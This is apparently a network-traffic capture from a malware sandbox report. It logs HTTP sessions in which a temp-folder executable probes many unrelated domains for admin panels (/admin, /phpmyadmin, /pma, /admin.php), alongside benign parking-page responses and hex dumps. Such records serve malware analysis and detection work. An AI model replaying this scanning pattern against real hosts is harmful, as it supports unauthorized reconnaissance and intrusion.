Nov 30, 2023 11:22:44.992546082 CET	1340	IN	Data Raw: 2c 52 45 41 43 54 5f 41 50 50 5f 56 45 52 49 5a 4f 4e 5f 46 45 45 44 5f 50 41 52 54 4e 45 52 5f 43 50 3a 22 6e 61 6d 65 61 64 6d 69 6e 5f 70 61 72 6b 5f 64 6d 5f 32 39 30 33 5f 67 6f 64 61 64 64 79 22 2c 52 45 41 43 54 5f 41 50 50 5f 56 45 52 49 Data Ascii: ,REACT_APP_VERIZON_FEED_PARTNER_CP:"nameadmin_park_dm_2903_godaddy",REACT_APP_VERIZON_FEED_ENABLE:"true",REACT_APP_VERIZON_FEED_PROXY:"https://api.aws.parking.godaddy.com",REACT_APP_FORWARDER_LANDER_URL_DAN:"https://dan.com/buy-domain/{DOMAIN}
Nov 30, 2023 11:22:44.992561102 CET	378	IN	Data Raw: 72 61 66 66 69 63 5f 74 79 70 65 3d 54 44 46 53 5f 42 49 4e 4e 53 26 74 72 61 66 66 69 63 5f 69 64 3d 62 69 6e 6e 73 26 7b 51 55 45 52 59 7d 22 2c 54 44 46 53 5f 41 46 54 45 52 4e 49 43 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 66 74 65 72 6e Data Ascii: raffic_type=TDFS_BINNS&traffic_id=binns&{QUERY}",TDFS_AFTERNIC:"https://www.afternic.com/forsale/{DOMAIN}?utm_source=TDFS_DASLNC&utm_medium=DASLNC&utm_campaign=TDFS_DASLNC&traffic_type=TDFS_DASLNC&traffic_id=daslnc&{QUERY}"},FORWARDER_LANDER_A
Nov 30, 2023 11:22:44.992575884 CET	1340	IN	Data Raw: 6e 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 Data Ascii: n){function r(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}n.d(t,{Z:function(){return r}})},43144:function(e,t,n){n.d(t,{Z:function(){return a}});var r=n(49142);function o(e,t){for(var n=0;n<t.length;n++){
Nov 30, 2023 11:22:44.992589951 CET	1340	IN	Data Raw: 61 2e 65 78 70 6f 72 74 73 2c 61 2c 61 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 61 2e 65 78 70 6f 72 74 73 7d 6e 2e 6d 3d 65 2c 6e 2e 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 66 75 6e Data Ascii: a.exports,a,a.exports,n),a.exports}n.m=e,n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,{a:t}),t},n.d=function(e,t){for(var r in t)n.o(t,r)&&!n.o(e,r)&&Object.defineProperty(e,r,{enumerable
Nov 30, 2023 11:22:44.992604971 CET	378	IN	Data Raw: 74 4e 6f 64 65 26 26 75 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 75 29 2c 6f 26 26 6f 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 28 6e 29 7d 29 29 2c 74 29 72 65 74 75 Data Ascii: tNode&&u.parentNode.removeChild(u),o&&o.forEach((function(e){return e(n)})),t)return t(n)},l=setTimeout(s.bind(null,void 0,{type:"timeout",target:u}),12e4);u.onerror=s.bind(null,u.onerror),u.onload=s.bind(null,u.onload),c&&document.head.append
Nov 30, 2023 11:22:44.992621899 CET	1340	IN	Data Raw: 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 2c 7b 76 61 6c 75 65 3a 22 4d 6f 64 75 6c 65 22 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 Data Ascii: ject.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.p="https://img1.wsimg.com/parking-lander/",function(){if("undefined"!==typeof document){var e=function(e){return new Promise((functi
Nov 30, 2023 11:22:44.992645025 CET	1340	IN	Data Raw: 6c 65 74 65 20 74 5b 6e 5d 2c 65 7d 29 29 29 7d 7d 7d 28 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 36 34 31 3a 30 7d 3b 6e 2e 66 2e 6a 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 76 61 72 20 6f 3d 6e 2e 6f 28 65 2c 74 29 3f 65 Data Ascii: lete t[n],e})))}}}(),function(){var e={641:0};n.f.j=function(t,r){var o=n.o(e,t)?e[t]:void 0;if(0!==o)if(o)r.push(o[2]);else{var a=new Promise((function(n,r){o=e[t]=[n,r]}));r.push(o[2]=a);var i=n.p+n.u(t),u=new Error;n.l(i,(function(r){if(n.o

Session ID	Source IP	Source Port	Destination IP	Destination Port
213	192.168.2.4	51472	104.247.82.52	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:44.900013924 CET	215	OUT	GET /admin/ HTTP/1.1 Host: cm.cz Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:45.050359964 CET	1340	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_dc0X0ZeXX0dgS/iyyMmcIYBRP5Zp0yhESfVk3BM55qURmRCxW+GMbvN/OVgZUj9/JLDe5XBJWSaTxPrLf932Pw== Accept-CH: viewport-width Accept-CH: dpr Accept-CH: device-memory Accept-CH: rtt Accept-CH: downlink Accept-CH: ect Accept-CH: ua Accept-CH: ua-full-version Accept-CH: ua-platform Accept-CH: ua-platform-version Accept-CH: ua-arch Accept-CH: ua-model Accept-CH: ua-mobile Accept-CH-Lifetime: 30 X-Domain: cm.cz X-Subdomain: Content-Encoding: gzip Data Raw: 31 36 37 65 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5b eb 76 da c8 b2 fe 1d 3f 85 42 d6 36 f8 0c 77 7c 77 e4 1c 6c ec d8 9e 80 6f d8 31 ce 9a 93 25 a4 06 64 0b 89 91 84 01 67 e7 01 ce 73 ed 17 db 5f 75 b7 a4 16 e0 64 32 3b 33 bf 36 33 31 a8 bb ba ab ba 6e 5d 55 dd 7a fb ba 71 7e d8 ee 5c 1c 69 83 70 e8 ec af bc a5 2f cd 32 42 a3 60 58 5d c7 33 1f 1f d9 4c cf 34 8f 27 93 c6 65 e7 ec 57 ef fe 74 f0 64 b6 ea 97 47 07 07 97 f5 c6 f5 a4 3e b9 ae 9f 1d d4 3f fc 3e 6e 1c 1f b5 ef ae dc f2 89 5f de e8 dd 5c 6c 1d 9d b5 b7 b6 a6 1d f7 62 78 d5 1d 35 67 eb 4f 8f db bf 76 ec 13 f7 b1 35 62 96 fb 70 5e 6f 9d 99 c6 5d e3 ce fc f5 f2 ac 55 76 ef 7e bd 3f fb b0 d5 36 ed b3 c6 76 dd 3b b9 fb b5 b2 b1 7d 58 9f 1c d5 eb 97 ba fe d9 32 cb 77 e5 7b 76 77 57 b6 fa d7 25 7b 36 6b 0e cd d3 ce c1 d5 c5 c6 fd a8 3c 1b 1c 5d f7 6e 1f 6b 07 cd 8d 8d df 6f ae 86 57 87 d3 8f bf bc 6f 76 9f 5a a5 f3 db fe fd cd c3 4e e9 ec 43 83 6d dc 1d 9c 7d bc 36 da d3 0b ff 43 6f a7 56 bd 98 e8 7a 46 9b 0e 1d 37 d0 33 83 30 1c ed 96 4a 93 c9 a4 38 a9 15 3d bf 5f aa ec ec ec 94 a6 c4 0f 0e b4 eb 18 6e 5f cf 30 37 a3 c5 bf 88 5f cc b0 f6 57 34 7c de 0e 59 68 80 8d e1 a8 c0 7e 1f db 4f 7a e6 d0 73 43 e6 86 85 f6 6c c4 32 9a 29 9e f4 4c c8 a6 61 89 e6 dd d3 cc 81 e1 07 2c d4 c7 61 af b0 9d 29 a9 13 b9 c6 90 e9 99 27 9b 4d 46 9e 1f 2a c3 27 b6 15 0e 74 8b 3d d9 26 2b f0 87 bc 66 bb 76 68 1b 4e 21 30 0d 87 e9 95 bc 16 0c 7c db 7d 2c 84 5e a1 67 87 ba eb c5 73 87 76 e8 b0 7d 73 58 34 9f df 96 c4 83 a0 3e 30 7d 7b 14 6a 81 6f ea 19 Data Ascii: 167e[v?B6w\|wlo1%dgs_ud2;3631n]Uzq~\ip/2B`X]3L4'eWtdG>?>n_\lbx5gOv5bp^o]Uv~?6v;}X2w{vwW%{6k<]nkoWovZNCm}6CoVzF730J8=_n_07_W4\|Yh~OzsCl2)La,a)'MF*'t=&+fvhN!0\|},^gsv}sX4>0}{jo
Nov 30, 2023 11:22:45.050474882 CET	1340	IN	Data Raw: c1 87 be e7 f5 1d 56 34 bd 61 c9 b0 02 e6 06 ac 64 79 43 c3 76 83 92 69 f4 8a 0f c1 3b a3 3b d2 2b 99 fd b7 25 31 78 9f b3 21 08 67 0e d3 86 cc b2 0d 3d 83 0e 06 96 ed af 14 8d 00 0b fd 1c 84 86 5f d6 be ac bc ea 1a e6 63 df f7 c6 ae b5 ab 8d 7d Data Ascii: V4adyCvi;;+%1x!g=_c}'-(]}]J\|be4+lP3ml*Of!cv5vYO"Wy<DvGpdX&0a7]_l~i6kI{b
Nov 30, 2023 11:22:45.050493002 CET	1340	IN	Data Raw: eb 30 cf 31 33 1a 12 be 3e 32 dc cc e7 2e d2 e6 47 28 d5 ab 57 af 1a e7 cd 7f fd 7f ab ae e1 ff 8b ab f3 c6 d1 d9 ca ab b7 25 03 d9 74 09 7a 28 93 e0 45 8d ac 4a 8d 24 fa 96 28 6c 4d e9 9e 07 11 81 56 46 a3 d5 0b 1a 89 44 65 c0 db 41 25 4a 8a f1 Data Ascii: 013>2.G(W%tz(EJ$(lMVFDeA%JKL!&BTm+UhRr)O7)X)69rz7GT+B'f>x2}l+h{#MGd"-y-+#3jVohZFB1r$G
Nov 30, 2023 11:22:45.050509930 CET	1340	IN	Data Raw: df ec f6 fc 21 f3 69 0e 66 d5 fd fe 98 76 8a 20 99 21 c6 75 3e a2 7d 91 7a be 70 27 93 1d 8d bb a7 16 39 1e 6b 84 8a 1f aa 98 74 24 81 03 8c 72 45 ba 2b 6c f4 01 5c 4a 70 01 4a 0f 8c 80 dd f8 0e 81 2f e7 7f b6 f4 2e 0c f4 68 24 b9 d6 63 5e 18 a5 Data Ascii: !ifv !u>}zp'9kt$rE+l\JpJ/.h$c^<m<1fF--@oH\|s]eB&!yax`$qB\|Vr=w$9PdT@#gxIwi.VZwaR>? '`qMQIGnI*n( Bu}rjA
Nov 30, 2023 11:22:45.050535917 CET	1340	IN	Data Raw: c5 67 0f cc 44 f0 fe 67 d7 23 d6 42 37 33 78 85 6f 8a e8 23 8a 5a b4 9c d7 7d c0 d5 6a fc ad 46 7a aa 84 3a d4 49 b1 55 06 3f 40 42 26 c9 8f 78 0f ea 83 38 ee e1 72 a6 2b 1b 54 75 d0 70 b5 9e 52 72 3e 61 ac 01 04 fd 09 3d bf 01 35 f5 f0 df 72 a4 Data Ascii: gDg#B73xo#Z}jFz:IU?@B&x8r+TupRr>a=5rTpM1m5?Apm;%[2 x:DVZss\Z$EFMm(),oM^NV35X"PdD/OH-DqB,MI',
Nov 30, 2023 11:22:45.050556898 CET	174	IN	Data Raw: cd 5e b5 b2 53 29 6f 95 ad 75 2c 2f 51 e3 94 fb cd d2 cb 0e a5 e4 c6 b4 b8 5e 49 2c a0 37 e3 f9 cd e9 6c 72 73 3a bb 3f e7 9c bf d0 0d 10 bc 44 7a 6a 65 76 2b 95 cd ad ea e6 76 a5 52 fd fa 22 3a f1 c2 7c 82 ee a5 0b da 29 34 92 43 c4 8f e8 10 2a Data Ascii: ^S)ou,/Q^I,7lrs:?Dzjev+vR":\|)4C*[`]MQ@g$+g$N-A
Nov 30, 2023 11:22:45.050565004 CET	59	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
214	192.168.2.4	52175	54.209.32.212	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:44.936487913 CET	224	OUT	GET /phpmyadmin/ HTTP/1.1 Host: bjail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:45.035626888 CET	202	IN	HTTP/1.1 302 Found content-length: 0 date: Thu, 30 Nov 2023 10:22:44 GMT location: https://www.hugedomains.com/domain_profile.cfm?d=bjail.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
215	192.168.2.4	52584	104.238.144.219	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.040929079 CET	217	OUT	GET /pma/ HTTP/1.1 Host: nrnet.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:45.171050072 CET	528	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 30 Nov 2023 10:22:45 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_wsgi/4.6.4 Python/3.6 Location: https://nrnet.com/pma/ Content-Length: 230 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 72 6e 65 74 2e 63 6f 6d 2f 70 6d 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://nrnet.com/pma/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
216	192.168.2.4	52888	15.197.142.173	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.046899080 CET	222	OUT	GET /phpmyadmin/ HTTP/1.1 Host: a6a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:45.150644064 CET	419	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:45 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-122-234.ec2.internal X-Request-Id: 942c2405-bff2-44b9-8275-f5a89109001d Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
217	192.168.2.4	51474	145.14.30.248	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.081446886 CET	215	OUT	GET /admin HTTP/1.1 Host: san.ee Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:45.295337915 CET	828	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:45 GMT Content-Type: text/html Content-Length: 494 Last-Modified: Tue, 28 Nov 2023 01:18:59 GMT Connection: keep-alive Keep-Alive: timeout=20 ETag: "65654003-1ee" Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 22 20 6e 61 6d 65 3d 22 68 74 74 70 22 20 76 61 6c 75 65 3d 22 35 30 30 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 35 30 30 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 72 6f 74 6f 63 6f 6c 3d 22 68 74 74 70 73 3a 22 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 72 74 3d 35 30 30 31 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 55 52 4c 3d 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 22 3a 22 2b 70 6f 72 74 2b 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 0a 20 20 20 20 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 55 52 4c 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html> <body> <input type="hidden" id="http" name="http" value="5000"> <input type="hidden" id="https" name="https" value="5001"> <input type="hidden" id="prefer_https" name="prefer_https" value="true"> </body> <script type="text/javascript"> var protocol="https:"; var port=5001; var URL=protocol+"//"+location.hostname+":"+port+location.pathname+location.search; location.replace(URL); </script></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
218	192.168.2.4	51972	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.305643082 CET	215	OUT	GET /admin HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:45.484390974 CET	436	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:45 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
219	192.168.2.4	52328	192.99.158.243	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.305689096 CET	223	OUT	GET /admin.php HTTP/1.1 Host: onlist.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:45.419773102 CET	569	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.onlist.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 Set-Cookie: _dhc.139992723=f1cb34a1-4b54-4284-b6bd-4ba6149142d2; path=/ X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:18 GMT Connection: close Content-Length: 139 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 6f 6e 6c 69 73 74 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.onlist.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
220	192.168.2.4	52535	13.248.169.48	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.305689096 CET	221	OUT	GET /admin.php HTTP/1.1 Host: 6ail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:45.405215979 CET	880	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:45 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://6ail.com/admin.php X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_cXKaJjVMiqD5NeLEbneZalqrG4N6O0eEOdGnb4ia+SHOn76Zrcz2gLiZwQx3pWO0L89Rqv/z6N8Y44g+8Q+RSQ Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.88.132;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
221	192.168.2.4	53256	3.64.163.50	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.331583977 CET	224	OUT	GET /admin/ HTTP/1.1 Host: gcann.cr.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
222	192.168.2.4	53258	3.64.163.50	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.332178116 CET	218	OUT	GET /admin/ HTTP/1.1 Host: gbya.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
223	192.168.2.4	53421	15.197.142.173	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.356736898 CET	222	OUT	GET /phpmyadmin/ HTTP/1.1 Host: m7l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:45.458498001 CET	419	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:45 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-123-244.ec2.internal X-Request-Id: 2c0662d3-1d70-4c07-b1fd-2769ef029d23 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
224	192.168.2.4	53329	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:45.383270979 CET	214	OUT	GET /pma/ HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
